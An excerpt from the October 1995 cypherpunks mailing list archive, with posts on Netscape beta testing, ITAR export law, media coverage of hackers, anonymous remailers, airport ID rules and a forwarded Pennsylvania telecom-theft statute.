co-opt the list. You can return to your regularly scheduled
paranoid fantasies. Thank you....









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 23:38:09 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130406.AA33835@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Yes. :)

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Fri, 13 Oct 95 15:21:47 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <Pine.LNX.3.91.951013151805.9143A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


>         Why would a company like Netscape jeopardise themselves by even
> letting out a beta version so
> hackers have time to find bugs before the full version is released. Don't
> take me wrong I have only been on the net fer a little over a year and Love
> Netscape.  And If I knew what I was Doing I would love to help them.....

Actually, it is not jeopardy that they get from doing so, but some of the 
best bug finders and security experts on the planet.. for close to free.
If hackers can find 10 bugs before final release, it means there is a 
good chance that they will fix those bugs before final release.

Think of it this way.. you practice a new task until you are competent at 
it.. beta code is the same.. it is the practice or scratch code that may 
be refined into the final product.

Thanks-
robL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 13 Oct 95 15:28:15 PDT
To: cypherpunks@toad.com
Subject: mental cryptography
Message-ID: <199510132226.PAA13627@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As we know, security is always relative to a threat model.  For example, most 
cryptographic protocols today will not protect their users against the cloning 
attack I described earlier, nor more mundanely, against video surveillance of 
your computing space.  What can you do if you ARE worried about such attacks?

The answer is doing cryptography in your head.  Well not quite, since many 
cryptographic operations are very computing intensive, and not everyone can do 
1000 bit mental modular exponentiation in a reasonable amount of time.  But if 
you have a piece of secure hardware that you can trust to do some of these 
operations for you, then all you need is a secure communications channel to 
this piece of hardware.  

There may be other ways, but I suggest that you establish a common key with 
your crypto server ahead of time, and then simply encrypt all your 
communications using a symmetric algorithm.  RC4 may be a reasonable choice, 
since the operations are simple and easy to remember, but you need to keep 
track of a 255-byte state.  WAKE is probably better.  Although it uses a large 
key table, you only have to memorize it once, after which the only state that 
is changing is four 32-bit registers.

I am sure better algorithms can be found for this purpose if mental 
cryptography is made explicit as a design goal.  Perhaps it should be?

 - the Mad Scientist in the Middle

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH7l+9IjPOsOWLIJAQEwDwP7BB6ZlEoYVoOFYtzNDcF4XpCKs71GyASC
TiwCf+donWycN9SiJHApyXXbnuppGiEyAQYMBGkSLMyIwPMcE4v6CSt2DkpbPjkF
XauZy4rqDNljV2pk7PldbPOHDow9wOeoSF2S/luKAoHx5aJWVQrE5SKIgwY2xWfx
DYhjte2v9Jc=
=88be
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Wertz <hwertz@exclusive.com>
Date: Fri, 13 Oct 95 13:34:17 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.LNX.3.91.951013153201.21699D-100000@henry.henry.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995 infinet.com!zoetrope@henry.henry.net wrote:
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Ouch!  I know,
                                                         I need to fix it..
                                                         but sendmail.cf
                                                         beating is not
                                                         much fun 8-(.
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
> 
> 
> 
     Just for "cracking unix codes" crack is fine with me 8-).  I'm just in
it for the knowledge..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Fri, 13 Oct 95 12:42:43 PDT
To: cypherpunks@toad.com
Subject: Netscape question transformed
Message-ID: <m0t3pvO-000K7RC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I would like to rephrase the question I had yesterday, which was
completely misunderstood.  The point I was meaning to make was supposed to
be as follows:



        Why would a company like Netscape jeopardise themselves by even
letting out a beta version so
hackers have time to find bugs before the full version is released. Don't
take me wrong I have only been on the net fer a little over a year and Love
Netscape.  And If I knew what I was Doing I would love to help them.....





        Anyway I don't mean to waste your time, but aren't these kinda
things for stating your opinion?  And to clarify any questions on my age I
am 13 and was born in 1982. ok? thanks.....And I would again like to thank
perry for understanding what level I'm on. I will try my best not to annoy
you or cause you any inconvenience.  And to sameer I am sorry for what I
said but you have to understand Why I said it......

                        Sincerely,
                                CyberPunc X 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 13 Oct 95 15:48:59 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: applications
Message-ID: <199510132243.PAA16846@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Fri Oct 13 15:41:23 1995
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Fri, 13 Oct 1995 17:50:29 -0400
> To: cypherpunks@toad.com
> From: zoetrope@infinet.com (cYberpUnc)
> Subject: applications
> Sender: owner-cypherpunks@toad.com
> Content-Length: 218
> 
>         I know this isn't what you guys generally talk about but I was curious.
> Off the top of your head do you know of any sites where I can get kracking
> apps for macs?  Any information would be greatly appreciated.
> 
> 
> 

Has someone set up a mail-to-news gateway between cypherpunks and alt.2600
that we're unaware of?

Dana W. Albrecht
dwa@corsair.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Fri, 13 Oct 95 07:59:43 PDT
To: adam@homeport.org
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <m0t3lUR-0002e4C@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Adam" == Adam Shostack <adam@homeport.org> writes:

    Adam> 	The new betas of Netscape store CA trust stuff in a
    Adam> NDBM database.  Does anyone have good tools for looking at
    Adam> NDBM stuff?

In Perl a NDBM database looks like an associative array.

Andreas



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMH59b0yjTSyISdw9AQFiEwP/RxshjTL9vHuGrsHmq4yVdda7M9oQttX8
ms0Mkla1VP+aTh9cSu/B9bzPaX5DmVZ1KDKv/NoHlqcXTQl9BlokiwDtOPKGDCq2
bt08ubgnUF1H5r9aTgaU+qp4qhOo4aUHOwPSV/DC1SLVWk23UYASm+LXAwtwPf0X
sMkEI8GIYy8=
=zGky
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Fri, 13 Oct 95 16:40:10 PDT
To: cypherpunks@toad.com
Subject: cryptp & PCMCIA committee mtg notes
Message-ID: <v02120d01aca4a227e012@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


Clipper ain't dead yet:

TECHNICAL MEETING UPDATES - Discussion and work on the following
topics occurred at the meeting: Zoom Video, Thermal Characterization of a
card inside a laptop, Changes to Custom Interfaces, Indirect Access to PC
Card memory, and changes/clarification to the Multifunction specification
(this one was deemed very important).  A presentation was made by Spyrus
on security cards and a proposal to set up a technical working group was
made. ........

2) PC Card Working Group Security Card proposal by Spyrus - wants
security card id to be a part of the standard and supported by system
software.  The government Fortezza card would be included.


**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Fri, 13 Oct 95 13:33:36 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting Mental States
Message-ID: <9510132031.AA10823@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I just arrived in Ottawa, Canada from Seattle, USA.  I had sort of 
thought through exactly what Tim just described.  I had a little 
notebook with me and was doing some calculations and design of a 
fractal compression algorithm.  I started to think about El-Gamal and 
decided to look at elliptical curve algorithms.  So, I pulled out my 
copy of Applied Crypto to look up some things and started writing 
things down. (BTW: I had Applied Crypto with me for recreational 
reading on the plane, I don't normally carry it everywhere I go.)

Anyway, I got to customs in Ottawa, and they asked me if I had 
anything to declare.  I immediately thought, "Should I tell them 
about the notebook?"  I decided against it.  How does export of 
intellectual property work?

The other question they asked me was "Do you have any eggs?"  I 
started giggling.  **SARCASM ON** I always carry an egg around in my 
inside coat pocket.  Who knows when you might need one, especially 
when in a foreign country. **SARCASM OFF**  I don't know, I guess the 
question just struck me as funny.

Brad Shantz
TRISource (formerly TriLogic) Windows Development Services




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Fri, 13 Oct 95 13:39:59 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <199510132039.QAA01087@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>         Why would a company like Netscape jeopardise themselves by
> even letting out a beta version so hackers have time to find bugs
> before the full version is released. Don't take me wrong I have only
> been on the net fer a little over a year and Love Netscape.  And If I
> knew what I was Doing I would love to help them.....

I don't think that this can jeopardize a company...  What would you
rather see?  A company makes a beta release for people to attempt to
break, fixes the bugs, and then releases a better product?  Or would
you rather see a company release a product, tell people it is secure,
and then get bitten by numerous holes in it?

From a PR perspective, it sounds much better to take the first tack.
Similarly, you will get a better product using the first method.
Using the second method, NOT beta-testing your product, has a greater
chance of jeopardizing a company.  At least if they put out a beta, if
the press calls, they can say "this is not our final product -- we
wanted to let people give it a try and find problems, so that we can
fix them before we start shipping".

-derek

PS: I remember what it was like being 13 -- I remember feeling like I
knew more than everyone around me, my parents, my friends, my
teachers.  The only suggestion I have for you is to realize that no
matter how much you know, or how much you think you know, there is
always someone else who knows more than you do.  Wisdom is learning to
figure out who that person is and listen to what they have to say.

Good Luck!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 13 Oct 95 14:44:08 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
Message-ID: <199510132142.RAA18581@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Cate writes:
>On Fri, 13 Oct 1995, Michael Froomkin wrote:
>> On Thu, 12 Oct 1995, Vincent Cate wrote:
>> > If while you are outside the USA you want to write some software that uses
>> > encryption and sell it worldwide, let me know.  I could put you up while
>> > you wrote it and my company could sell it for share of the selling price. 
>> > Let me know what you are thinking of and how long you think it would take.
>> 
>> Of course if you are a US person (citizen or green card holder) this is 
>> just as much a violation of the ITAR as if you did it from inside the US...
>> 
>> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>> Associate Professor of Law | 
>
>Yes, I am still a US citizen, so far. 
>
>The corporation I work for is a legal entity of Anguilla.  I would not
>personally be selling it, the corporation would.  Do you think that is ok? 

The violation is in the *export*, not the sale.  Your suggestion is
that the US person developing software outside the country evades ITAR.
Mr Froomkin suggests otherwise.  His credentials seem sounder, but I,
for one, would like to hear his reasoning.

If it's true that ITAR makes such behavior illegal, then ITAR not only
inhibits freedom of speech, it inhibits freedom of *thought*.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 16:34:53 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <aca444bd1102100414dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 PM 10/13/95, s1018954@aix2.uottawa.ca wrote:
>Really? I thought except for incomes taxes, US laws only apply in American
>territory as opposed to applying to American people wherever they are (as
>I heard Germany's does).

It depends on what is meant by "outside the country." The law forbidding
travel to Cuba, for example, is not enforced by U.S. cops outside the
country, but upon reentry to the U.S. Ditto for other laws, such as those
affecting aid and support of countries we don't like, and the laws about
trading with the enemy.

>What if you were a dual citizen (US/Canada in my case)?

For the purposes of crypto laws (and many other laws, truth be told),
Canada is treated as a smallish northern state in the U.S.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 13 Oct 95 16:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510132358.QAA06931@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGDAHw.1t@sgi.sgi.com>, Michael James Gebis <m-gebis@students.uiuc.edu> writes:
> In uiuc.mlist.cypherpunks zoetrope writes:
>> Can I ask a question....are you guys into cryptology for the interesting
>> facts and knowledge or fer cracking unix codes and raising havoc?

> _I_ got into it for the chicks.  Upon reflection it seems that it may not
> have worked as well as I might have hoped. :)

Yeah, definitely for all those crypto-groupies.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 13 Oct 95 14:07:46 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <199510132105.RAA06805@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510130722.AA03096@anon.penet.fi>, an116512@anon.penet.fi wrote:

> why is the cp meeting sponsored by sun?
> so we can hear a sales pitch on java?

Where are clueless idiots that post messages such as the one quoted above
coming from?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH7UnyoZzwIn1bdtAQGPDAF+IRhbPNJK0fo6PXTrKliTU7ITwkzPOD5L
agjzNaBIDukCFmtfz1ZZNyHCC8OTeq5r
=B+J8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 14 Oct 95 02:17:36 PDT
To: fletch@ain.bls.com (Mike Fletcher)
Subject: Re: Identity database, another attempt...
In-Reply-To: <9510131347.AA18300@outland>
Message-ID: <951013.170750.4L0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, fletch@ain.bls.com writes:

>         Not really related to the deadbeat dads thing, but we
> got a notice that the US DOT has mandated that all air passengers
> must present a gov't issue photo ID with a name that matches that
> on your ticket.  In addition it says that passengers should:
>
>         * be prepared to answer questions about their bags.
>         * be prepared to open the trunk of their car.

Have you flown recently?  They now ask you this scripted question about
whether you have been approached by anyone you don't know since arriving
at the airport, and warn you not to accept anything from a stranger or
leave your carry-on baggage unattended until you board the plane.  The
ticket agent told me it was a "new FAA regulation".  I hadn't flown
anywhere for a few years.  Anyone know how long this has been happening?

>         Goodbye freedom, hello police state.

I wonder how long before I need a passport to cross a state line...

OBsecurity:  Both directions, I had to carry a PC-Bus servo controller
card.  It's not nice to x-ray an EPROM, so I had it hand-inspected.  I
wouldn't let them open the static bag without a strap.  Both times, the
guard gave it a casual glance and passed it through.  In San Antonio,
they x-rayed the box while I held the card.  This particular card
assembly is pretty large.  A dummied version would have a sizeable
hidden compartment.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH7lbBvikii9febJAQFS6gQAhnHW0IVAepxlmQ8rt48RCciYVo2KVUyI
q0fI3jwYxTcRIlNeqrfsxHiWY9gqvb7OtO9K9S30Y319P+THFhdx6hY6i2n4CM9m
iUWzv+usUZzgnIxa2l2cpcviBIY8p2ggc/gad9lV3hooIgH1jAzHYpMXIzRuE6bw
Yh2AoVI/Wrc=
=RwHs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Oct 95 14:16:59 PDT
To: cypherpunks@toad.com
Subject: CAT_sho
Message-ID: <199510132116.RAA26244@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Econom of Oct 14 ogles the catfight between Wintel
   and JavaNet to outclaw whineflesh.


   "Will your next computer be a tin can and a wire?"

      This week's fall in technology stocks was bad enough.
      But what if the Internet destroyed the personal-computer
      industry ...?

      Sun, Oracle and Netscape are spending tens of millions
      of dollars on a bet that the Internet can do a lot more
      than pass around e-mail and transmit data. They think it
      can also do much of the work of today's computers,
      holding not just information but software, from word
      processors and spreadsheets to games and entertainment
      programs. Most radically, they go on to argue that this
      could end the reign of the personal computer. Forget
      Windows 95; some people are starting to wonder if they
      need Microsoft at all.

      But those who predict that such machines will kill the
      PC are ignoring computing history, and glitch-prone real
      life. The PC beat the mainframe because users wanted the
      whole computer on their desktop, not in the basement.
      That makes Java terminals look like a step backwards: by
      putting program storage far away down a shared network,
      it makes it vulnerable to delays, congestion, and all
      the unpredictability of anything out of a user's
      control.


   CAT_sho  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com (cYberpUnc)
Date: Fri, 13 Oct 95 14:38:46 PDT
To: cypherpunks@toad.com
Subject: thanx
Message-ID: <m0t3rk3-000K9HC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        Thanks to everyone especially Bill Sommerfeld and Derek Atkins fer
helping me out.......






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com (cYberpUnc)
Date: Fri, 13 Oct 95 14:54:51 PDT
To: cypherpunks@toad.com
Subject: applications
Message-ID: <m0t3rzZ-000K7TC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I know this isn't what you guys generally talk about but I was curious.
Off the top of your head do you know of any sites where I can get kracking
apps for macs?  Any information would be greatly appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 13 Oct 95 14:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks "Exposed"
Message-ID: <199510132153.RAA16456@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain




>X-Authentication-Warning: teal.csn.net: Host localhost didn't use HELO protocol

?que?

>Attn Reporters and Writers!!
>
>who are the CYPHERPUNKS?

First, most of those on this list, rather easily discernible since most of
them make no attempt to conceal their views. Second, anyone who agrees
substantially that the universal deployment of strong cryptology tools will
increase individual freedom, and that this is desirable.

>what are they talking about?

Since you're subscribed to this list, you can easily find out.

>what have they done in the past?

See a few web pages or FTP archives. "L. Detweiler's" page has plenty of
links to other places, although there are a few things I'd like him to
clarify (see below).

>who are the "leaders"?

Tim May says there are none. LD repeatedly contends that May, and anyone else
who agrees with his statement, are either ignorant or deliberately lying. (By
virtue of this post, I'm sure I'm now on this list.) Neal Stephenson's *The
Diamond Age* description of "CryptNet" is remarkably similar to this whole
situation. I wonder if Neal used any aspects of the LD "phenomenon" as a
template. (Aside: If you haven't yet read Diamond Age, do so immediately. My
highest possible rating.)

>what do they believe in?

See above. But individuals always differ.

>what are their *real* goals?

Why don't you join the guild, get your barcode tattoo and find out?

>My name is L.Detweiler, and I've made a serious study of the more ulterior
>aspects of the CYPHERPUNKS for several years,

Ulterior? I'd say it's right out in the open. The statists want the state to
have power over the individual. Most people on this list believe this would
be bad. Both are pretty well "represented" by a number of outspoken, public
individuals. It's reassuring to see the number of computer industry pros and
average folks alike who don't buy into the claim that freedom can be
preserved by outlawing it... or the equally likely claim that freedom itself
is bad, and people who advocate it are evil, right up there with violent
criminals (but see how many people who make these statements also advocate
"might makes right" rule of force by the creation and enforcement of coercive
laws, and the mass robbery of as many people as possible?). Best that these
people be as open and outspoken as those they disagree with, the better to
know their methods and goals.

>and I invite you to peruse my findings at the web site below.

I have, and I quote therefrom further below.

>I've been quoted in various articles and I'm available for serious interviews
>with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.

Now that's blatant advertising. Where were you when all these so-called
"journalists" descended on the net, desperately searching for people who
would tell them the Internet was a festering pool of child molesting, money
laundering slime? Will we soon see you defending organizations like FinCEN?

>note: be forewarned that key cypherpunks consider me a heretical
>blasphemer because of the tenacious, unforgiving honesty and
>zealous antisycophancy by which I have pursued this herculean study.

Perhaps if you were less pompous and self-aggrandizing in your presentation,
people would be more willing to seriously entertain your ideas. Anyway, for
those who wish to browse

http://www.csn.net/~ldetweil

go ahead, and make up your own mind. Your page doesn't have a mailto:
button, Lance. But I figured this was perfectly appropriate for public
consumption anyway:

>Other Sites

>   Psychopunkery
[...]
>          + Raph Levien's remailer page - amazing how long it took to get
>            this simple and basic utility from the cypherpunk crowd --
>            and surprise! written by an outsider

The rest I'll let pass, but why is Raph an "outsider"? And what is "inside"?
Does agreeing with the above statements I've generalized make one "inside"?


-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:05:30 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510130518.BAA22989@jekyll.piermont.com>
Message-ID: <199510130700.AA39159@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> >It was surprisingly weak for a John Markoff story (he usually gets the
>> >details exactly right) but it is an issue that had to be brought up
>> >and I see no reason to call it a bad article overall.
>> 
>> *snort* I've been trying to keep my views to myself on this but claiming
>> Markoff usually gets things right is plain misleading. His articles are
>> about as one-sided as you can get and full of factual inaccuracies. The
>> Mitnick series were a farce and his latest work is reactionary fluff and
>> shows his true lack of understanding of his topics.
>
>He's as close as you are going to get to meeting the journalistic ideal.
>I'm willing to settle for someone who gets the job right nearly all of
>the time.

God help us all.

I am probably biased against the media in general, relying on them to present
a balanced and unbiased by the reporter, editor or media ownership is a tall
task for them. They are too quick to jump into the sensationalist angle and
disregard the overall view and truth.

For cypherpunks to get the proper facts and implications (subjective I guess)
into print, it's usually the case that any communication with the press has
to be very clear, concise, unambiguous and to the point. If you give them any
chance to wander off the rails they will take it and distort your words
according to their agenda. Once that happens it's usually the case the
article is scoffed at for a week or so and then forgotten until it's dragged
up later as someone's point for whatever they want to support in their
discussion.

If there are good articles out there then it's usually the case the reporter
actually went and took the time to investigate their subject matter and
gather all points of view and to verify as many facts as they can. You say
Markoff does this, I don't agree he does. Then the editor has to keep their
big red pen out of it enough so the message isn't distorted. This doesn't
occur often IMHO. You're better off purchasing space in the paper yourself
and getting it said your way.

It's because of this dilemma that a lot of the people I communicate with, and
who have the information people should know, choose to avoid and shun any
media contact. They don't want to be linked with some lame ass report.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 13 Oct 95 15:26:39 PDT
To: cypherpunks@toad.com
Subject: early anonymous remailer
Message-ID: <9510132205.AA00756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I was talking with someone at NSA's NISSC today and he was
talking about Hamilton's support of the gov't in the Whiskey Rebellion.
To voice his support (an unpopular position at the time) he wrote
an article under a pseudonym, had it published in a French paper and
then re-published over here, citing the French paper.

This is the earliest example of an anonymous remailer I've found yet. :-)



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:31:06 PDT
To: raph@CS.Berkeley.EDU (Raph Levien)
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130458.VAA16480@kiwi.cs.berkeley.edu>
Message-ID: <199510130705.AA35603@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


I was going to ignore this, but I feel verbose today..

>I write the letter to the editor, or does someone else want to? One
>thing I'll need is a brief outline of Damien Doligez's achievements to
>support the idea that characterizing him as a "hacker" is not quite
>right.

Hacker good. Cracker bad. Media distort hacker to bad. Media hype merchants.
Media bad. Bad ol' Media. Degauss. Reformat.

>Raph (who's wondering if there's something inherent in the media
>process that keeps them from getting their stories straight)

Reporters. Editors. Owners.

Cheers,
Mark
mark@locahrd.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Fri, 13 Oct 95 15:08:15 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121638.MAA20833@jekyll.piermont.com>
Message-ID: <9510132208.AA13555@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry said:
> I am frequently informed before people redistribute, but not always,
> I'm afraid.

After somebody started advertising a car repair place through my
remailer, I found that most people don't seem to read the headers,
or their MUA hides that icky stuff from them.  I'd guess that
reporters will frequently fall into this group.  You might have
better luck if you moved the notice back to your sig.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:31:01 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
In-Reply-To: <9510130722.AA03096@anon.penet.fi>
Message-ID: <199510130708.AA36406@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Shucks, mebbe coz good ol Sun developed the lil ol java language? Ya think?

Werd.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Edwards <tedwards@access.digex.net>
Date: Fri, 13 Oct 95 15:26:57 PDT
To: cypherpunks@toad.com
Subject: New PA law (????)
Message-ID: <Pine.SUN.3.91.951013182341.10684B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



[Can anyone provide more information on this?  I am still looking for the 
original source to confirm/deny this.  Please pay special attention to 
anti-anon-mailer deals]

 ---------- Forwarded message ----------
This law was just passed and signed by the governor in PA.  If you look at it,
you'll notice that it makes it illegal to post instructions for making certain
things (like phreaking boxes) and it also makes it illegal to use an anonymous
remailer (conceal or assist another to conceal from any service provider).


   Amending Title 18 (Crimes and Offenses) of the Pennsylvania
   Consolidated Statutes, further providing for manufacture, distribution
   or possession of devices for theft of telecommunications services.
   
   The General Assembly of the Commonwealth of Pennsylvania hereby enacts
   as follows:
   
   Section 1. Sections 910 and 3926 of Title 18 of the Pennsylvania
   Consolidated Statutes are amended to read:
   
   § 910. Manufacture, distribution or possession of devices for theft of
   telecommunications services.
   
   (a) Offense defined. Any person commits an offense if he:
   
   (1) [makes or possesses any instrument, apparatus, equipment or]
   makes, distributes, possesses, uses or assembles an unlawful
   telecommunication device or modifies, alters, programs or reprograms a
   telecommunication device designed, adapted or which can be used:
   
   (i) for commission of a theft of [telecommunications] telecommunication
   service or to acquire or facilitate the acquisition of
   telecommunication service without the consent of the telecommunication
   service provider; or
   
   (ii) to conceal or to assist another to conceal from any [supplier of
   telecommunications] telecommunication service provider or from any
   lawful authority the existence or place of origin or of destination of
   any telecommunication; or
   
   (2) sells, possesses, distributes, gives or otherwise transfers to
   another[,] or offers, promotes or advertises for sale [any instrument,
   apparatus, equipment or device described in paragraph (1) of this
   subsection,] any:
   
   (i) unlawful telecommunication device, or plans or instructions for
   making or assembling the same, under circumstances evidencing an
   intent to use or employ such [instrument, apparatus, equipment or]
   unlawful telecommunication device, or to allow the same to be used or
   employed for a purpose described in paragraph (1) [of this
   subsection], or knowing or having reason to believe that the same is
   intended to be so used, or that the aforesaid plans or instructions
   are intended to be used for making or assembling such [instrument,
